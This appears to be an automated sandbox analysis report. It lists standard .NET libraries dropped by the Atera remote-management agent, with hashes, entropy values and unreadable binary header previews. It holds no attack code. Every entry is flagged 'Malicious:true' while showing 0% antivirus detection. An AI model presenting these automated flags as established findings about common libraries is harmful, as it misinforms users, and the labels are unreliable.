                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):63056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2857708531976195
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:S+UfRQY8PGNWovMLJYBjtLgnuAAAAAknwd45FnrfMq1/yJuoiYblHJg6GOmDuZEr:S+tY8PIiq51wcFnDMsno7jRmai76+
                                                                                                                                                                                                                                                                                              MD5:8E7BC8F33E83F98BC5112D8DF48FA624
                                                                                                                                                                                                                                                                                              SHA1:E63BBFC1452DB5EA6A57A1B5AE50E2C03E758A29
                                                                                                                                                                                                                                                                                              SHA-256:DD73348A85A38D063A0DDFED8EF10DAACC1C30CC3AE801E9D098EDF8E4833EA2
                                                                                                                                                                                                                                                                                              SHA-512:B0A6254F2B4DB36614DFD2B2C2F6CAE70C6504ABBAC5F18139590AAC4DD71DC11B5D0102AFF85E92660F917D752193F117273A934575D0A55441A9F1DB0AAE7E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... .......................@......A"....`.....................................O.......................P(... ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........N.................P...(.........................................(&...*^.(&......J...%...}....*:.(&.....}....*:.(&.....}....*:.(&.....}....*.~....*.0..........(....,..*..(.....o'......&...*...................0...........(.......((...-..,..*.*.(....,.r...p......%...%...()...*..(*...*.(....,.r...p......%...%...%...()...*...(+...*.(....,!r...p......%...%...%...%...()...*....(,...*..,&(....,..r...pr...p.()...(-...*..(....*.*.(....,.r...p......%...%...()...*...(/...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Configuration.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.551066390151139
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Rr0yw26S3QgV/UxNmsUspvnipmgNRLGc3WxsBU7RWPpNyb8E9VF6IYijSJIVxfj8:Rr0j26i92L6zBU7qEpYi60m7
                                                                                                                                                                                                                                                                                              MD5:0B26D5C7509CE13F88CEDD513719750E
                                                                                                                                                                                                                                                                                              SHA1:95014FA4FB133B6F9810D03AB7C0556DAC22E4D2
                                                                                                                                                                                                                                                                                              SHA-256:C85323605DFDE235F9C0E7C8AB25FEB3BFDE3CDD10A53BF86352992375A02228
                                                                                                                                                                                                                                                                                              SHA-512:482492B666A970CF662E1B334885102B047B73A48685FDB1ED62BA59E2F954AECA4233E8DD19FB631C165505D7B665A848CF12582261A98F09BB5151AE390C04
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Dv2..........." ..0..:..........bX... ...`....... ....................................`..................................X..O....`..L............D..P(...........V..T............................................ ............... ..H............text...h8... ...:.................. ..`.rsrc...L....`.......<..............@..@.reloc...............B..............@..B................AX......H........&..X+...........R..`...xV.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Console.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.366090837889375
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:TTGWFIlYoY5b3OxMZnndnnennnnnnRt3nV+JEtpzU+uujK2lBJqFsSjKcb72EpYO:TiKIe9JyvSCG2l+NT76w
                                                                                                                                                                                                                                                                                              MD5:01C3D505F70553DA5CE5749B2072598F
                                                                                                                                                                                                                                                                                              SHA1:F968657B17033E6C3DE5EE33F829EDAC3C0A9902
                                                                                                                                                                                                                                                                                              SHA-256:41BB9C82269D3880590C76AE5D918CBD2F9A9A985E14167EDD4C46BC01EF0C57
                                                                                                                                                                                                                                                                                              SHA-512:03A7A8D0DED1E071364C9F3C50AE6CD3DBE8B7E3D2DD7EDFA1DCD4D7A7150FA68F3E0DB67856F35ADA57D807A21B703B11293E9DA2A49B94E5D801633568AB4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D..........." ..0.................. ........... ....................................`.................................1...O.......L...............P(..........0...T............................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B................e.......H........C..Hl..........H...h.............................................("...*^.("......X...%...}....*:.(".....}....*:.(".....}....*:.(".....}....*.~....*.0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r...p......%...%...(%...*...(+...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Debug.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19024
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.631317912248179
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:mv+kBD/v7WJZVMWurNyb8E9VF6IYijSJIVxCb70T:mmMbumEpYi60GAT
                                                                                                                                                                                                                                                                                              MD5:8E9B5EF88B7EBD9A0CC4E648B7C061B6
                                                                                                                                                                                                                                                                                              SHA1:E67049110D70876111CCBE4303AC577797F4AA6C
                                                                                                                                                                                                                                                                                              SHA-256:C2F3C2BED46301899721451BAF54E7703B1F803F5B91C88BFF6094D4970580E3
                                                                                                                                                                                                                                                                                              SHA-512:CD0D600C8C6D42BC8FBFEFDC58E633BBE46398FD3ECB98601B8AD4DF88E4F547A937D9596DCC7A3CEB495F9828784CEE1F1EF1230380443A23E8C8F26123ECF8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+8p..........." ..0.............>4... ...@....... ..............................W.....`..................................3..O....@..(............"..P(...`.......2..T............................................ ............... ..H............text...D.... ...................... ..`.rsrc...(....@......................@..@.reloc.......`....... ..............@..B.................4......H.......d!......................d2......................................J.o....(...+(.....*..(....*.~....*.*.(....*.s.........*.~....*..(....*.*.s.........*:.(......}....*.(....*F(....,........*.*.0..p.........(....-.*..-.r...ps....z.....o......(....,.*r...p.......(.......,..(....(......%-.&.+.o....( .......{....(....*"..(!...*..s....*.*..(....*.BSJB............v4.0.30319......l...D...#~..........#Strings....x...(...#US.........#GUID.......P...#Blob...........W..........3....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.59691314093314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:JzTu6iOUdGgvklNpdOHhvVhZQVW27FWcNyb8E9VF6IYijSJIVxC/po:JziZOwklFYh43EpYi60b
                                                                                                                                                                                                                                                                                              MD5:7736B59E467AAEFA0EFA73937BE65733
                                                                                                                                                                                                                                                                                              SHA1:FDE46F878FF3FDFFDACFECD9B0D86C21520F684F
                                                                                                                                                                                                                                                                                              SHA-256:99AED0C536B3D9105D952A7D1C98CC19695BA80971904D3502E81E296391F09C
                                                                                                                                                                                                                                                                                              SHA-512:6F0EAB6E45B8BDE078D34A6355FD2292AAD514BB413ACF58CF3385262F84215E53AE3900508A11EFC693D447B440F5D1D4C8D312908554B3624AC1A4E8F92F75
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....dn..........." ..0..0...........N... ...`....... ....................................`.................................GN..O....`..`............:..P(..........<M..T............................................ ............... ..H............text........ ...0.................. ..`.rsrc...`....`.......2..............@..@.reloc...............8..............@..B................{N......H........'..$%...................L........................................(....*^.(......./...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..-.r...ps....z.o....(...+(.....*..-.r...ps....z.-.r...ps....z.o.....s!...(...+(.....*..-.r#..ps....z.(....&.o.....(...+&.*..(....*.~....*.*.(....*.s.........*.~....*..(....*.*.s.........*....0...........(......%-.&r7..ps....z}......%-.&r...ps....z}......}......o

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33872
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.561493627348274
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:B2x4wbbh7Kx8kJ3yiW8/zKeGmBt1qm1CS1yvhGcRtquW3LUWbNyb8E9VF6IYijSn:fwvh7KxdlW8JvrpEpYi602f
                                                                                                                                                                                                                                                                                              MD5:C293C0DA6B9366B6C4D4CBB97150CDD7
                                                                                                                                                                                                                                                                                              SHA1:B02EF2864D7194803FAADAFD31CF5E7C8B1B98E5
                                                                                                                                                                                                                                                                                              SHA-256:E32AA53CF8D54AA0B34274E654B40ABDBCFFBE7024EC4B72DF8EC7F9AFCD0BB2
                                                                                                                                                                                                                                                                                              SHA-512:3ACEBB0DD1AE6A69BEB0C1AF55608EAE28AAD67523B93A7F8C277692EAF4A40D8565E8512B74F13661A217A2824E27A44E3655E727E2A63AF0E2469737EBF17F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W!..........." ..0..R...........p... ........... ....................................`.................................9p..O....................\..P(..........0o..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B................mp......H......../...>...................n........................................(....*^.(.......E...%...}....*:.(......}....*:.(......}....*:.(......}....*:.( .....}....*.0..+........{....o:......+......o!....o".....X....i2.*:.( .....}....*2.{....o5...*..{....*..0..P........-.r...ps#...z.o$...~....(...+.o$...(...+('....o$...(...+('....o$...(...+('....*..( ...*.~....*.*.(....*.s.........*.~....*..( ...*.*.s.........*..( .....}......(......}......}.......}....*..{....*..{....*"..}...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45648
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.39363345514802
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:/X8pDT8XP6hA+wMaLWCzAVLOPnaEpYi60w+:/XiDTaP6hfY1GOPnb76P+
                                                                                                                                                                                                                                                                                              MD5:71A04A924FBC5D648EF852284D931ACC
                                                                                                                                                                                                                                                                                              SHA1:51911CEFFE2FF1D7260BDF5CDF2C39929E1E1996
                                                                                                                                                                                                                                                                                              SHA-256:7E4871BFBD64B01CF0876A0BF02099528FE130ADF31BDEB1016DC06206DD6AA7
                                                                                                                                                                                                                                                                                              SHA-512:891006019659170422FB955B1153BB30F954DDFB758E3EB56E299642D7AB679741B1D37BB1850A900E25A4FA0B1C91FFDBA6B4A63D14C799E5686260B1F02FFE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+..........." ..0.................. ........... ..............................by....`.....................................O.......(...............P(.............T............................................ ............... ..H............text....~... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B........................H........=...X.............X...H........................................~....*..0..........(....,..*..(.....o#......&...*...................0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r...p......%...%...(%...*...(+...*.(....,.r...p......%...%...%...(%...*....(,...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.ConfigurationExtensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):23632
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.628913155600511
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:toePm+VIkOdHt6Zx8HignlSZYT9zWzL0WVNyb8E9VF6IYijSJIVxD7PqF6h:fPzVIko9FD9o3EpYi60nXh
                                                                                                                                                                                                                                                                                              MD5:1D1C608F502F58F376EBAADE561720F1
                                                                                                                                                                                                                                                                                              SHA1:82CEE758BAF30579113C1C43ACF49B4A7535BD65
                                                                                                                                                                                                                                                                                              SHA-256:685A5A14916A154BF39448A766D85E6B2BD8750C053C7AAFF43F7C75B6EB634E
                                                                                                                                                                                                                                                                                              SHA-512:BF62B2EFBDC38C54AB5DDC1A0C2BF5B6EFAF875742A99F7A74FC4F809EC9E205DE2DB168A9DD5B66842C103FBD80515F515D1D04AF6E159BB00DD6CD56014B65
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..*...........H... ...`....... ...............................<....`..................................H..O....`...............4..P(..........tG..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......$$..."...................F......................................:.(......}....*..{....*:.(......}....*..{....*..{....*"..}....*V.(......}......}....*..{....*..{....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*...~....%-.&~..........s....%.....(...+*..-.r...ps....z.o.....o......(...+&.*...0..V.......s.......}......}.....-.r...ps....z.{....-.r...ps....z........s ...o...+&.o....(...+&.*...0..).......rC..p..(#...-...o$.....+...........(%...*6.~&...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):59984
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.314915840218046
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:DCD3yk2B8+9PwwOxC8wZLq6J4q2r0qafouRVPvW37EpYi60xRVt:+kB8+94xxBmm6mqaBafouRdi076YVt
                                                                                                                                                                                                                                                                                              MD5:07DB1E7841F9B711613F9D36B49FD292
                                                                                                                                                                                                                                                                                              SHA1:263A9888E154918D874F5ADC78F16525906FE7C7
                                                                                                                                                                                                                                                                                              SHA-256:F63F865D19B252F8CBFD44BFB2C67542734E88D2A8BD720336FD3002A86D97BD
                                                                                                                                                                                                                                                                                              SHA-512:8A73E111E98EDEC333999DFC2930747486D463F40BBA89F486AB037546E61C82ED57FCEBE9C76ECB487596F98F65B2D76D0357B379810FC1F82B4BF79B137757
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............N.... ........... ....................... .......A....`.....................................O.......H...............P(..............T............................................ ............... ..H............text...T.... ...................... ..`.rsrc...H...........................@..@.reloc..............................@..B................-.......H........F.............h.................................................( ...*^.( ......?...%...}....*:.( .....}....*:.( .....}....*:.( .....}....*.~....*.0..........(....,..*..(.....o!......&...*...................0...........(.......("...-..,..*.*.(....,.r...p......%...%...(#...*..($...*.(....,.r...p......%...%...%...(#...*...(%...*.(....,!r...p......%...%...%...%...(#...*....(&...*..,&(....,..r...pr...p.(#...('...*..((...*.*.(....,.r...p......%...%...(#...*...()...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.338955490792153
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Glx+oQSHqk49NI0OP7NWEfDkkuiEk3LVi4EpYi60wk:QVQSyI0OP7NxfAkuiEkbwB76I
                                                                                                                                                                                                                                                                                              MD5:2346448FC8741FDD8CB2FEC4A13A09C6
                                                                                                                                                                                                                                                                                              SHA1:302E59E4AC137233191D1E0A4D09FD1E7D6A0D21
                                                                                                                                                                                                                                                                                              SHA-256:88006DB3BA1F287D2F2389EE59A72CFB3E3076297A5EA0B1DA5BC1AE6991ECF2
                                                                                                                                                                                                                                                                                              SHA-512:34435E18F0E19DE9627D28EF3FC572A96C16E1DADF8B58632C9B0FC90F2C05D3568A87619A46C59E82B199D1AD3132C4B7D340A699B7E14D60A1A621E7BA8A95
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.;..........." ..0..l............... ........... ...................................`....................................O.......l............x..P(.............T............................................ ............... ..H............text... k... ...l.................. ..`.rsrc...l............n..............@..@.reloc...............v..............@..B........................H.......H9...E..........@.......P........................................~....*..0..........(....,..*..(.....o)......&...*...................0...........(.......(*...-..,..*.*.(....,.r...p......%...%...(+...*..(,...*.(....,.r...p......%...%...%...(+...*...(-...*.(....,!r...p......%...%...%...%...(+...*....(....*..,&(....,..r...pr...p.(+...(/...*..(0...*.*.(....,.r...p......%...%...(+...*...(1...*.(....,.r...p......%...%...%...(+...*....(2...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):697936
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.9631065670925505
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:+eos/POdGV5jfWrV/9Yeh9eRcyLfLYtT5mWxTZ/B7jW5JMtRRpKzQy:+0/POdGV5jfW5VnhFyvOB7jW5JMt0
                                                                                                                                                                                                                                                                                              MD5:199D5DA16448D57D9688B0FC45798C9D
                                                                                                                                                                                                                                                                                              SHA1:6063CCCDA4939CF8C943D663A475E0D190BBEE21
                                                                                                                                                                                                                                                                                              SHA-256:D80BBBEA555AB41EEB4A9BE225392F699E2DE379A5814D3ACE544CCC74615353
                                                                                                                                                                                                                                                                                              SHA-512:F2DDBD15834ABDE4CB49F60A5A1919F0B2EA633ED601050A541F095B1EF43B2A5BDB59781E81380A5A3D24DF37F4D986F088172C61799D33B2E4018EEB877652
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..t..........N.... ........... ..............................P.....`.....................................O....................~..P(.......... ...T............................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................-.......H........p................................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{Z....3...{Y......(....,...{Y...*..{[.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Polly.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):285776
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.198436452323558
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:+MiAQB4wmESyxV8pj06e4isQ8gsHsjb/W1DBZ7DhsNcOb:+MZpj06vUsMjbQ77D+j
                                                                                                                                                                                                                                                                                              MD5:E93FC4EAAD9EA0C4EFAE4A9BB02D3498
                                                                                                                                                                                                                                                                                              SHA1:2448FEB521F3380C97E9DE43222B837DC5CD7D46
                                                                                                                                                                                                                                                                                              SHA-256:FFC830BABC6AE1A9CA0015741935D5295C8F217E562BF5394EDA81017706A0EA
                                                                                                                                                                                                                                                                                              SHA-512:147A185BCCA17B0F41234145F53FF3AFC2F8E9B41298144DC09A6E46653669BC221E3A293BD6252C91342295D866AFA61B66FAB09BD49D68C8D86D1F1F3B1270
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..*...........H... ...`....... ...............................e....`..................................H..O....`..L............4..P(...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H.......Xd......................TG......................................^.{....,.(G...z..}.....*^.{....,.(G...z..}.....*"..(L...*"..(M...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Hosting.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38992
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.292917096352768
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:pdfuvOXFXW/8O6bXD+eeIgLPRsnHnyhQupytM9z7O3zfXYvj8rbPH5nTLhCPsIdk:pxuJRRsnHnyhQupytM9z7O3zfXYvj8rX
                                                                                                                                                                                                                                                                                              MD5:844D54BBD438B9A7669244D635F5ABC9
                                                                                                                                                                                                                                                                                              SHA1:930E1A3E21F1D499121D6071B6A6826FA38F0A55
                                                                                                                                                                                                                                                                                              SHA-256:632E3017C032CE66014A51E89D0A8A43E9AEFF0E0018FB835D88283B547A86A5
                                                                                                                                                                                                                                                                                              SHA-512:BA931F57CB51C13276BFA9B22FE7F28BAFFD0B797F4893E4FB1CCE3F66CBAA27036F982E219F1D82CD0F4DD16201FDCB2D5165F08C39B590E082921FCB33DF44
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
